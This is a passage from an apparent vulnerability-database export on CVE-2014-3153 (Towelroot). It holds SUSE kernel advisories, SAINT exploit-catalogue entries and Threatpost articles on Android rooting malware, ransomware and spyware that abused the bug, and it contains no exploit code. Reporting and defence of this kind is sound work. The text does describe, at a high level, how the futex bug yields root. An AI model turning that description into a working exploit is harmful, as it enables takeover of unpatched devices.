security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:49:16", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "The SUSE Linux Enterprise 11 Service Pack 2 LTSS kernel was updated to fix\n a critical security issue:\n\n * CVE-2014-3153: The futex acquisition code in kernel/futex.c can be\n used to gain ring0 access via the futex syscall. 
This could be used\n for privilege escalation by non-root users. (bnc#880892)\n", "edition": 1, "modified": "2014-06-24T20:04:13", "published": "2014-06-24T20:04:13", "id": "SUSE-SU-2014:0837-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-06/msg00025.html", "type": "suse", "title": "Security update for Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:42:33", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "The SUSE Linux Enterprise 11 Service Pack 2 LTSS kernel was updated to fix\n a critical security issue:\n\n * CVE-2014-3153: The futex acquisition code in kernel/futex.c can be\n used to gain ring0 access via the futex syscall. This could be used\n for privilege escalation by non-root users. (bnc#880892)\n", "edition": 1, "modified": "2014-06-25T00:04:51", "published": "2014-06-25T00:04:51", "id": "SUSE-SU-2014:0837-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-06/msg00028.html", "type": "suse", "title": "Security update for Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:14:55", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "The SUSE Linux Enterprise 11 Service Pack 3 RealTime Extension kernel was\n updated to fix a critical privilege escalation security issue:\n\n * CVE-2014-3153: The futex acquisition code in kernel/futex.c can be\n used to gain ring0 access via the futex syscall. This could be used\n for privilege escalation by non-root users. 
(bnc#880892)\n", "edition": 1, "modified": "2014-06-14T02:04:20", "published": "2014-06-14T02:04:20", "id": "SUSE-SU-2014:0796-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-06/msg00018.html", "type": "suse", "title": "Security update for Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:57:50", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "The SUSE Linux Enterprise 11 Service Pack 3 kernel was updated to fix a\n critical privilege escalation security issue:\n\n * CVE-2014-3153: The futex acquisition code in kernel/futex.c can be\n used to gain ring0 access via the futex syscall. This could be used\n for privilege escalation by non-root users. (bnc#880892)\n", "edition": 1, "modified": "2014-06-11T05:04:34", "published": "2014-06-11T05:04:34", "id": "SUSE-SU-2014:0775-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-06/msg00014.html", "type": "suse", "title": "Security update for Linux Kernel (critical)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:40:12", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "kernel update for Evergreen 11.4 fixes local privilege escalation in futex\n code (bnc#880892 / CVE-2014-3153) and a regression causing a crash if\n IPsec peer is unavailable\n\n", "edition": 1, "modified": "2014-07-08T20:04:15", "published": "2014-07-08T20:04:15", "id": "OPENSUSE-SU-2014:0878-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-07/msg00006.html", "type": "suse", "title": "kernel update fixes local privilege escalation and a regression causing a crash if IPsec peer is unavailable (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2019-05-29T19:19:25", "bulletinFamily": 
"exploit", "cvelist": ["CVE-2014-3153"], "edition": 2, "description": "Added: 12/03/2014 \nCVE: [CVE-2014-3153](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153>) \nBID: [67906](<http://www.securityfocus.com/bid/67906>) \nOSVDB: [107752](<http://www.osvdb.org/107752>) \n\n\n### Background\n\nThe futex system call in Linux provides a mechanism for user-space locking. \n\n### Problem\n\nA vulnerability in the Linux kernel allows an unprivileged user to gain root access using a specially crafted `**futex_requeue**` call. \n\n### Resolution\n\nUpgrade to a fixed kernel package from your Linux vendor. \n\n### References\n\n<https://lists.debian.org/debian-security-announce/2014/msg00130.html> \n\n\n### Limitations\n\nExploit works on CentOS 7 and Red Hat 7 and requires an existing unprivileged shell connection to the target. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2014-12-03T00:00:00", "published": "2014-12-03T00:00:00", "id": "SAINT:62CFE302E8E036752E595883D6BF6332", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/linux_kernel_futex_requeue", "type": "saint", "title": "Linux kernel futex_requeue privilege elevation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:02:02", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "description": "Added: 12/03/2014 \nCVE: [CVE-2014-3153](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153>) \nBID: [67906](<http://www.securityfocus.com/bid/67906>) \nOSVDB: [107752](<http://www.osvdb.org/107752>) \n\n\n### Background\n\nThe futex system call in Linux provides a mechanism for user-space locking. \n\n### Problem\n\nA vulnerability in the Linux kernel allows an unprivileged user to gain root access using a specially crafted `**futex_requeue**` call. \n\n### Resolution\n\nUpgrade to a fixed kernel package from your Linux vendor. 
\n\n### References\n\n<https://lists.debian.org/debian-security-announce/2014/msg00130.html> \n\n\n### Limitations\n\nExploit works on CentOS 7 and Red Hat 7 and requires an existing unprivileged shell connection to the target. \n\n### Platforms\n\nLinux \n \n\n", "edition": 1, "modified": "2014-12-03T00:00:00", "published": "2014-12-03T00:00:00", "id": "SAINT:CC7E2B1599949AEEEB57BA20490CBAFE", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/linux_kernel_futex_requeue", "title": "Linux kernel futex_requeue privilege elevation", "type": "saint", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:38", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "description": "Added: 12/03/2014 \nCVE: [CVE-2014-3153](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153>) \nBID: [67906](<http://www.securityfocus.com/bid/67906>) \nOSVDB: [107752](<http://www.osvdb.org/107752>) \n\n\n### Background\n\nThe futex system call in Linux provides a mechanism for user-space locking. \n\n### Problem\n\nA vulnerability in the Linux kernel allows an unprivileged user to gain root access using a specially crafted `**futex_requeue**` call. \n\n### Resolution\n\nUpgrade to a fixed kernel package from your Linux vendor. \n\n### References\n\n<https://lists.debian.org/debian-security-announce/2014/msg00130.html> \n\n\n### Limitations\n\nExploit works on CentOS 7 and Red Hat 7 and requires an existing unprivileged shell connection to the target. 
\n\n### Platforms\n\nLinux \n \n\n", "edition": 4, "modified": "2014-12-03T00:00:00", "published": "2014-12-03T00:00:00", "id": "SAINT:58F657BC1DD46A0850A96857BC5FA43B", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/linux_kernel_futex_requeue", "title": "Linux kernel futex_requeue privilege elevation", "type": "saint", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:55:07", "bulletinFamily": "info", "cvelist": ["CVE-2014-3153"], "description": "Researchers have identified a recent wave of malware targeting the Google Play app marketplace that entices users to download utilities and games that when installed surreptitiously root devices.\n\nThe exploit, which mobile security firm Lookout calls autorooting malware, gives attackers complete control of the infected device. It was discovered by researchers in an app called LevelDropper.\n\n\u201cLevelDropper, an app in the Google Play Store that we determined to be malicious, is the latest example of a new and persisting trend in mobile threats: autorooting malware,\u201d wrote Colin Streicher, with Lookout\u2019s research and response team [in a blog posted Monday](<https://blog.lookout.com/blog/2016/06/27/leveldropper/>).\n\nLookout did not indicate which versions of the Android OS are vulnerable to LevelDropper.\n\nStreicher said once installed, LevelDropper, an app that gauged a horizontal plane with a simulated air bubble, quietly jailbreaks or roots the targeted Android phone or tablet. Next, with escalated privileges, attackers can remotely install additional applications without the target\u2019s knowledge.\n\n\u201cImmediately after running LevelDropper, we noticed that the Location Services window popped up blank. This is a significant red flag,\u201d Streicher wrote. 
Worse, after just 30 minutes of being attacked, the attacker had silently installed 14 applications with no user interaction.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/06/06235033/LevelDropper_Lookout.png>)\n\nCredit: Lookout\n\nUpon closer examination of the device\u2019s System Directory, researchers said, there were no overt signs that the Android device had been rooted. \u201cUsually we would see a superuser binary and often a rewritten \u201cinstall-system-recovery\u201d script, which is used to ensure that root access survives upgrades.\u201d\n\nLevelDropper is just the latest in a wave of similar type autorooting malware to hit the Google Play store. Lookout said Google has recently given the boot to Brain Test, ShiftyBug, Shuanet, and Shedun that each bundled the autoroot exploit. As with these others, LevelDropper was also pulled from the Google Play marketplace.\n\nWith LevelDropper, the attacker\u2019s intent appears to be to drive ad revenues.\n\n\u201cIn cases like this, developers often integrate auto-rooting functionality to drive app installs which can drive both perceived popularity and ad revenue,\u201d Streicher explains. In the case of the autorooting malware sample called Brain Test the attackers went so far as to hijack the victim\u2019s phone in order to post positive reviews of similar autorooting malware-laced games, he wrote.\n\nRoot exploits are not new and trace back to 2011 with the reported GingerMaster exploit that targeted Android 2.3 and gave attackers complete control over infected devices. [That malware](<https://threatpost.com/gingermaster-malware-seen-using-root-exploit-android-gingerbread-081811/75559/>), also packaged in infected apps, collected data on the user and downloaded and installed apps on its own, without the user\u2019s permission. 
More recently, in April, Blue Coat security researchers observed a weaponized version of the Towelroot jailbreaking utility used in tandem with [ransomware attacks against Android device users.](<https://threatpost.com/android-ransomware-attacks-using-towelroot-hacking-team-exploits/117655/>)\n\nAccording to a [2014 report by Lacoon Mobile Security,](<https://threatpost.com/android-root-access-vulnerability-affecting-most-devices/106683/>) Android root access vulnerabilities affect most devices. The exploit is tied to a vulnerability in version 3.14.5 of the Linux kernel. The firm called the bug \u201cTowelroot,\u201d because it is the same vulnerability (CVE-2014-3153) exploited in the latest Android rooting tool developed by the hacker George Hotz.\n", "modified": "2016-06-28T16:29:57", "published": "2016-06-28T12:29:57", "id": "THREATPOST:B433923D1E04E82EB6DD30772F192222", "href": "https://threatpost.com/google-play-hit-with-rash-of-auto-rooting-malware/118938/", "type": "threatpost", "title": "Google Play Hit With Rash of Auto-Rooting Malware", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:39", "bulletinFamily": "info", "cvelist": ["CVE-2014-3153"], "description": "A recently disclosed [vulnerability in version 3.14.5 of the Linux kernel](<http://threatpost.com/debian-urging-users-patch-linux-kernel-flaw/106516>) is also present in most versions of Android and could give attackers the ability to acquire root access on affected devices.\n\nResearchers at Lacoon Mobile Security are calling the bug \u201cTowelRoot,\u201d because it is the very same vulnerability (CVE-2014-3153) exploited in the latest Android rooting tool developed by George Hotz (Geohot). Successful exploitation of the Linux bug within the Android operating system would give the attacker administrative access to a victim\u2019s phone. 
Specifically, such access could potentially allow that same attacker to run further malicious code, retrieve files and device data, bypass third-party or enterprise security applications including containers like Samsung\u2019s secure Knox sub-operating system, and establish backdoors for future access on victim devices.\n\n[Jeff Forristal](<http://threatpost.com/android-master-key-malware-emerged-before-official-patch-details>), the chief technology officer at the mobile security firm Bluebox Security, explained to Threatpost in an interview that the Linux futex vulnerability affects Android devices because those devices run on the Linux kernel, and once the bug became public, it was only a matter of time before someone developed an Android-specific exploit for it. George Hotz, a well-known figure in the jailbreaking and rooting scene, took that next step.\n\n\u201cThis is pretty common practice/recipe in the Android rooting scene: they wait for a general-purpose Linux kernel vulnerability to surface, then they race to create an Android-specific exploit for it that can root the device,\u201d Forristal said.\n\nThis vulnerability exists in Android version 4.4 and earlier, and is therefore present on nearly every commercial build, including the wildly popular Samsung Galaxy S5, according to [research from Lacoon Mobile Security](<http://www.lacoon.com/blog/2014/06/towelroot-gives-root-access-samsung-galaxy-s5-popular-android-devices/>). Other vulnerable devices are said to include the Samsung Note 3, LG G Flex, the Motorola RAZR HD/M and Razr Maxx HD, and the Sony Xperia E1, C6603, C5303, Xperia T, Xperia z1, and Xperia SP among others.\n\n\u201cThe vulnerability is currently codenamed TowelRoot after a rooting tool that was released on mobile forums that uses the vulnerability to root most of the popular mobile devices on the market,\u201d writes Ohad Bobrov, Lacoon Security\u2019s vice president of research and development. 
\u201cThis tool is being widely publicized and is easily available for use without the need for technical know-how.\u201d\n\nIn an email interview, Michael Shaulov, the CEO of Lacoon, explained that in the case of secure Samsung Knox environments, the exploit would trigger protection and issue an alert to users, but that, ultimately, the attacker could still gain root access.\n\n\u201cRight now this vulnerability is only used by the rooting tool and has yet to show up in any malicious sample,\u201d explains Bobrov. \u201cLearning from the past, we can assume that it is only a matter of time until exploits for this vulnerability are distributed through other channels.\u201d\n\nIn order to gain root access to a victim\u2019s phone using this vulnerability, an attacker would need to craft an exploit and package it within a malicious application. Because of this, users that avoid third-party markets and avoid following shady links or clicking on suspicious attachments should be immune.\n\n\u201cThe risk of this particular Linux kernel bug, as realized on an Android device, is that unprivileged generic Android apps with malicious intent can also exploit the same kernel vulnerability for other evil (non-root) reasons,\u201d Forristal said. 
\u201cThis has absolutely nothing to do with TowelRoot or rooting in general \u2014 it\u2019s just a callout that this time around it\u2019s a very general-purpose security risk that is relevant regardless of the device owner\u2019s rooting proclivities.\u201d\n", "modified": "2014-06-18T17:21:03", "published": "2014-06-17T10:47:45", "id": "THREATPOST:42E64B8A7AF8DD130DE81078204DEE28", "href": "https://threatpost.com/android-root-access-vulnerability-affecting-most-devices/106683/", "type": "threatpost", "title": "Android Root Access Vulnerability Affecting Most Devices", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:27", "bulletinFamily": "info", "cvelist": ["CVE-2014-3153"], "description": "A family of Android malware was so successful that at its peak, over the course of two months last year, it infected 14 million devices and rooted more than half of them, roughly eight million devices.\n\nResearchers said early Tuesday the strain of malware, dubbed CopyCat, helped its authors earn $1.5 million \u2013 primarily through ad fraud \u2013 from April to May 2016.\n\nResearchers with Check Point\u2019s Mobile Research Team, who found the malware in March this year, claim CopyCat mostly infected Android users in Southeast Asia, but that upwards of 280,000 U.S. Android users were also infected. According to researchers, Asia accounted for 55 percent of CopyCat infections. 
Africa, at 18 percent, accounted for the second highest number of infected devices.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/07/06223810/Screen-Shot-2017-07-06-at-12.39.15-PM.png>)\n\nThe malware never made it to Google\u2019s Play marketplace, but did spread via popular apps, which were repackaged with CopyCat and available for download on third-party app stores.\n\nThe malware lingers until the infected device is restarted; once that happens, it downloads a series of exploits from an Amazon S3 bucket and attempts to root the device.\n\n\u201cIf successful, CopyCat installs another component to the device\u2019s system directory, an activity which requires root permissions, and establishes persistency, making it difficult to remove,\u201d the researchers [wrote Thursday](<http://blog.checkpoint.com/2017/07/06/how-the-copycat-malware-infected-android-devices-around-the-world/>).\n\nOnce in, the malware targets Zygote, an Android core process that launches apps and if exploited, essentially grants attackers admin privileges.\n\nTriada, an Android Trojan uncovered by [Kaspersky Lab](<https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/>), and later by Check Point [in 2016](<https://threatpost.com/aggressive-triada-horde-variants-up-mobile-malware-threat/118767/>), previously used this technique. Kaspersky Lab\u2019s Anton Kivva, a malware analyst with the company, said in June that year Triada was infecting Zygote, obtaining super-user privileges, and using Linux debugging tools to embed a malicious DLL to target mobile browsers.\n\nResearchers at Check Point claim that with the CopyCat malware, attackers have taken a shine to injecting code into the Zygote process to get credit for fraudulently installed apps on the device by swapping out referrer IDs for legitimate apps with their own. 
The malware also displays fake ads and installs fake apps, two additional methods of generating capital for the attacker.\n\nResearchers were able to get a better idea of exactly what attackers were doing to victims\u2019 devices by looking through one of the malware\u2019s command-and-control servers. Daniel Padon, a mobile threat researcher with Check Point, told Threatpost Thursday that researchers have data from a C&C server going back more than a year. Between April and May, 3.8 million of the devices were being served fake ads while 4.4 million other devices were being used to steal credit for installing apps on Google Play, the firm claims.\n\nThe bulk of the exploits CopyCat used to root the eight million devices are years old, according to Check Point. Four of them were from 2014 and one was even from 2013, suggesting victims either didn\u2019t patch their devices, or patched infrequently.\n\nOne of the exploits, Towelroot (CVE-2014-3153) was behind a scourge of auto-rooting malware [this time last summer](<https://threatpost.com/google-play-hit-with-rash-of-auto-rooting-malware/118938/>) and a wave of Android ransomware attacks [in April of that year](<https://threatpost.com/android-ransomware-attacks-using-towelroot-hacking-team-exploits/117655/>) that targeted outdated systems.\n\nResearchers are unclear who exactly is behind CopyCat but note there are several connections to MobiSummer, an ad network based in China. 
It\u2019s possible, however, that the attackers simply used the network\u2019s code and infrastructure.\n\nCheck Point says Google, which it informed of CopyCat in March \u2013 shortly after it discovered the malware \u2013 has been able to \u201cquell the campaign\u201d over the past year.\n\nWhen reached by Threatpost on Thursday, a spokesperson for Google said the company has been familiar with CopyCat \u2013 malware it says is a variant of a larger, undisclosed malware family it has monitored since 2015.\n\n\u201cEach time a new variant appears, we update our detection systems to protect our users. Play Protect secures users from the family, and any apps that may have been infected with CopyCat were not distributed via Play. As always, we appreciate researchers\u2019 efforts to help keep users safe,\u201d Google said.\n\nGoogle introduced Play Protect, a service that scans previously downloaded apps to ensure they\u2019re safe from malicious components, [in May](<https://threatpost.com/android-gets-security-makeover-with-google-play-protect/125781/>) at Google I/O.\n\nPadon told Threatpost the malware demonstrated a number of new techniques, and that as far as he knew, wasn\u2019t connected to another family.\n\n\u201cWe didn\u2019t manage to affiliate this malware with any other known family,\u201d Padon said, \u201cIt also presents a lot of new techniques which were never seen before. If Google does come up with a name it will be interesting to know.\u201d\n\nCopyCat joins the ranks of other Android malware strains previously discovered by Check Point, like HummingBad and Gooligan. [Gooligan](<https://threatpost.com/gooligan-malware-breaches-1-million-google-accounts/122195/>) was blamed for the breach of 1 million Google accounts this past December. HummingBad, [disclosed by the firm last July](<https://threatpost.com/chinese-ad-firm-raking-in-300k-a-month-through-adfraud-android-malware/119030/>), reportedly raked in $300,000 a month for its authors via ad fraud. 
Both families of malware installed adware on infected handsets in order to generate revenue.\n", "modified": "2017-07-06T17:49:02", "published": "2017-07-06T13:49:02", "id": "THREATPOST:A1F7D2E70C26FAAFD6D382A08D8D7B38", "href": "https://threatpost.com/copycat-malware-infected-14m-android-devices-rooted-8m-in-2016/126691/", "type": "threatpost", "title": "CopyCat Malware Infected 14M Android Devices, Rooted 8M, in 2016", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:25", "bulletinFamily": "info", "cvelist": ["CVE-2014-3153"], "description": "A menacing wave of ransomware that locks up Android devices and demands victims pay $200 in Apple iTunes gift card codes is raising concern among security researchers. The ransomware attacks, they say, open a new chapter for Android vulnerabilities similar to Microsoft\u2019s obsolete, unpatched and unsupported Windows XP operating system.\n\n\u201cThis is a new and troubling development for the Android OS. This ransomware thrives on outdated Android devices that are not patched and will likely never be,\u201d said Andrew Brandt, researcher at Blue Coat and the analyst who discovered the vulnerability.\n\nHe said the ransomware attacks Android 4.x operating systems, predominantly used in 2012 to 2013. That version of the Android OS is still in use by approximately 60 percent of Android devices around the world, [according to Google\u2019s own internal estimates](<https://developer.android.com/about/dashboards/index.html>). And just as Microsoft stopped patching Windows XP, Google is highly unlikely to patch a 5-year-old OS, Brandt said.\n\n\u201cWhat we have here is a fully operational operating system which no longer receives updates,\u201d Brandt said. \u201cUsers are in danger of infection just by using it. 
Having things installed without any user interaction until it\u2019s too late is a pretty scary new development in Android threats,\u201d Brandt said.\n\nBrandt told Threatpost that the ransomware utilizes a three-prong attack. First, it uses the drive-by lbxslt exploit embedded in ads to penetrate users of the Android versions 4.0.3 and 4.4.4\u2019s default browsers. So far, the malicious ads are targeting porn websites.\n\nAttackers are using the lbxslt exploit, Brandt said, which was stolen from Hacking Team in July of last year. But Brandt said, the authors appear to be using an updated version of lbxslt that infects a larger range of Android 4.x OS devices compared to earlier versions.\n\nPhase two, Brandt said, is installing a weaponized version of the Towelroot jailbreaking utility. Used in the past by non-technical users, Towelroot is a once popular single-click Android rooting tool for Samsung Galaxy handsets and other Android devices running Android 4.4.2, according to Khang Nguyen, security researcher, at Duo Security.\n\nTowelroot, said Nguyen, is an exploit for ([CVE-2014-3153](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153>)) a vulnerability that affected the Linux kernel through 3.14.5. CVE-2014-3153 was discovered by comex (Nicholas Allegra) and the first exploit based on Towelroot written by well-known hacker geohot (George Hotz). This is not the first public Towelroot exploit, but it\u2019s likely the first drive-by malware attack using a weaponized version of Towelroot, Nguyen said.\n\nThe use of Towelroot is twofold. The first, Brandt said, is that Towelroot suppresses the normal pop-up permissions window on Android that appears when you install programs from Google Play. \u201cAll installs are silent and in the background,\u201d he said.\n\nUnder that cloak of indiscernibility, criminals use the compromised Android machines to download the ransomware called Cyber.Police. 
This is non-crypto ransomware that displays a note that vaguely looks like an official warning targeting visitors of porn websites stating: \u201cAll actions are illegal, are fixed. History query stored in the database of the U.S. Department of Homeland Security.\u201d Attackers claim to be either \u201cAmerican national security agency\u201d or \u201cnation security agency\u201d.\n\n\u201cThe ransomware doesn\u2019t threaten to (or actually) encrypt the victim\u2019s data. Rather, the device is held in a locked state where it cannot be used for anything other than delivering payment to the criminals in the form of two $100 Apple iTunes gift card codes,\u201d Brandt wrote in a research note.\n\nVictims who opt to pay the ransom to unlock their phone are directed to pay a \u201cfine\u201d between $100 and $200 to a \u201ctreasury account\u201d by submitting iTunes gift card codes. Use of iTunes gift cards for ransomware payments is unusual, given that Bitcoin payments have been the preferred untraceable form of payment for crypto-ransomware attackers for over a year now.\n\nBrandt said the easiest and most effective way to remove the ransomware is to restore the Android device to its original factory default software.\n\n\u201cWhen we executed the application\u2026, we learned that the malware\u2019s internal name for itself is \u201cnet.prospectus\u201d and engages in the sorts of behavior we\u2019ve come to expect from ransomware: It kills all other apps; prevents other apps from launching or stopping the ransomware,\u201d Brandt wrote. \u201cIt sets itself up to be the first thing to start at boot time; profiles the infected device; and communicates with a command-and-control server.\u201d\n\nThe best way to mitigate this vulnerability is to use a device that runs a more recent version of Android than the Android 4 family of operating systems, Nguyen said. 
Blue Coat recommends keeping a fresh device backup somewhere other than on your phone or tablet\u2019s internal memory or memory card. \u201cThat way, you can just perform a factory reset and not worry about losing anything other than the time it takes to reconfigure and reinstall your mobile device\u2019s apps,\u201d Brandt said.\n", "modified": "2016-04-25T19:36:33", "published": "2016-04-25T15:36:33", "id": "THREATPOST:DF79B36E4B10187B12FB82AEF22C5EA9", "href": "https://threatpost.com/android-ransomware-attacks-using-towelroot-hacking-team-exploits/117655/", "type": "threatpost", "title": "Android Ransomware Attacks Using Towelroot, Hacking Team Exploits", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:05", "bulletinFamily": "info", "cvelist": ["CVE-2014-3153", "CVE-2015-1805"], "description": "The Google Play Protect team said it identified a new strain of Android spyware called Tizi found inside several apps previously available via the Google Play marketplace. The recent discovery triggered a wider investigation by Google who said apps infected by the Tizi malware date back to 2015.\n\nRecent samples of Tizi allowed an attacker to root a targeted device and steal sensitive data from apps such as Facebook, Twitter, WhatsApp, Viber, Skype, LinkedIn and Telegram. Specific geographies targeted were Kenya, Nigeria and Tanzania, Google said. 
A smaller number of victims resided in the United States, researchers said.\n\n\u201cThe backdoor contains various capabilities common to commercial spyware, such as recording calls from WhatsApp, Viber, and Skype; sending and receiving SMS messages; and accessing calendar events, call log, contacts, photos, Wi-Fi encryption keys, and a list of all installed apps,\u201d researchers wrote in a [Google Security Blog post on Monday](<https://security.googleblog.com/2017/11/tizi-detecting-and-blocking-socially.html>).\n\nThe Tizi malware can also record ambient audio via the phone\u2019s microphone and silently take pictures with no on-screen notifications alerting the phone\u2019s owner.\n\n\u201cSubsequent command-and-control communications are normally performed over regular HTTPS, though in some specific versions, Tizi uses the MQTT messaging protocol with a custom server,\u201d Google said.\n\nGoogle Play Protect team said it discovered the spyware in September 2017, with the oldest sample dating back to October 2015. \u201cThe early Tizi variants didn\u2019t have rooting capabilities or obfuscation, but later variants did,\u201d researchers wrote.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/11/06222051/Google_Infections_Tizi.png>)In total, Google said it identified 1,300 devices affected by Tizi.\n\nInitially Tizi was discovered on a workout app \u201ccom.dailyworkout.tizi\u201d that was promoted via social media and meant to appeal to fans of the Kenyan fitness brand Tizi. \u201cThe Tizi app developer also created a website and used social media to encourage more app installs from Google Play and third-party websites,\u201d Google said. Other Tizi-laced apps (com.press.nasa.com.tanofresh and com.system.update.systemupdate) were also found.\n\nResearchers said attackers mostly targeted users with older model Android phones running older chipsets and past versions of the Android OS. 
Targeted handsets did not have the most recent security patches from Google and were vulnerable to one of nine vulnerabilities that ranged from the Linux kernel vulnerability \u201cTowelRoot\u201d ([CVE-2014-3153](<https://threatpost.com/android-root-access-vulnerability-affecting-most-devices/106683/>)) to a rooting vulnerability ([CVE-2015-1805](<https://threatpost.com/google-patches-old-flaw-exploited-by-rooting-application/117161/>)) patched in 2014.\n\nAndroid devices with patch levels later than April 2016 are less exposed to Tizi\u2019s capabilities, researchers wrote.\n\n\u201cIf a Tizi app is unable to take control of a device because the vulnerabilities it tries to use are all patched, it will still attempt to perform some actions through the high level of permissions it asks the user to grant to it, mainly around reading and sending SMS messages and monitoring, redirecting, and preventing outgoing phone calls,\u201d wrote the Google Play Protect team.\n\nThis past year Google has made strides to shore up the Android ecosystem, from the Google Play marketplace to devices themselves.\n\nIn May, Google introduced Play Protect, a new security feature that maintains some oversight on content downloaded to Android devices. For example, previously downloaded apps can be continually scanned for malicious behaviors as a counter to developers who push benign apps to Google Play that later connect and download malicious components. This also helps provide a line of defense against apps downloaded from third-party stores that aren\u2019t subject to Google\u2019s malware scanners. 
Google said in May that Play Protect will be capable of scanning and verifying up to 50 billion apps on a daily basis.\n\nDespite those gains, reports of malware making it into Google\u2019s marketplace continue.\n\nEarlier this month, Google [removed a phony adware-laced WhatsApp download](<https://threatpost.com/1m-downloads-later-google-pulls-phony-whatsapp-from-google-play/128778/>) from Google Play that was downloaded more than one million times. In March, Google booted more than a dozen apps from the Google Play store after [researchers discovered](<https://threatpost.com/adware-apps-booted-from-google-play/124549/>) each were rip-offs of legitimate apps and designed to aggressively push ads on Android devices. In August, [three messaging apps in the Google Play store](<https://threatpost.com/apps-infected-with-sonicspy-spyware-removed-from-google-play/127406/>) that contained spyware called SonicSpy were also removed. And most recently, a flashlight app snuck BankBot malware into the Google Play store that stole banking credentials from victims.\n", "modified": "2017-11-28T12:40:09", "published": "2017-11-28T12:40:09", "id": "THREATPOST:5E0275127CA36073D1FD4B8A32CAADD6", "href": "https://threatpost.com/google-detects-and-boots-tizi-spyware-off-google-play/129012/", "type": "threatpost", "title": "Google Detects and Boots Tizi Spyware Off Google Play", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:42", "bulletinFamily": "info", "cvelist": ["CVE-2014-3144", "CVE-2014-3145", "CVE-2014-3153"], "description": "Several vulnerabilities have been patched in the Linux kernel that could have led to a denial of service or privilege escalation.\n\nDebian, which distributes versions of Linux for personal computers and network servers, warned about the vulnerabilities [yesterday in a security update](<https://lists.debian.org/debian-security-announce/2014/msg00130.html>).\n\nThe most concerning 
issue (CVE-2014-3153) involves the futex subsystem and could let an attacker with local access perform unauthorized actions. According to LWN.net, the futex mechanism is a \u201c[fast, lightweight kernel-assisted locking primitive for user-space applications.](<http://lwn.net/Articles/360699/>)\u201d The local user could gain ring 0 control via the futex system call.\n\n\u201cAn unprivileged user could use this flaw to crash the kernel (resulting in denial of service) or for privilege escalation,\u201d the advisory said.\n\nAs futex tends to be available within most Linux sandboxes, some experts are viewing it as an especially urgent issue to fix.\n\nKees Cook, a ChromeOS security researcher and former Ubuntu Security Engineer, wrote [Thursday on Seclists.org](<http://seclists.org/oss-sec/2014/q2/469>).\n\n\u201cThe futex syscall can leave a queued kernel waiter hanging on the stack. By manipulating the stack with further syscalls, the waiter structure can be altered. When later woken up, the altered waiter can result in arbitrary code execution in ring 0,\u201d Cook said when explaining the bug.\n\nPinkie Pie, the anonymous teenage researcher who famously produced a sandbox escape against Chrome when he [chained together six individual vulnerabilities in 2012](<http://threatpost.com/google-fixes-second-set-chrome-bugs-used-pwnium-contest-031212>), was credited with discovering the futex issue.\n\nPinkie Pie, of course, has proved more than adept at finding additional bugs in 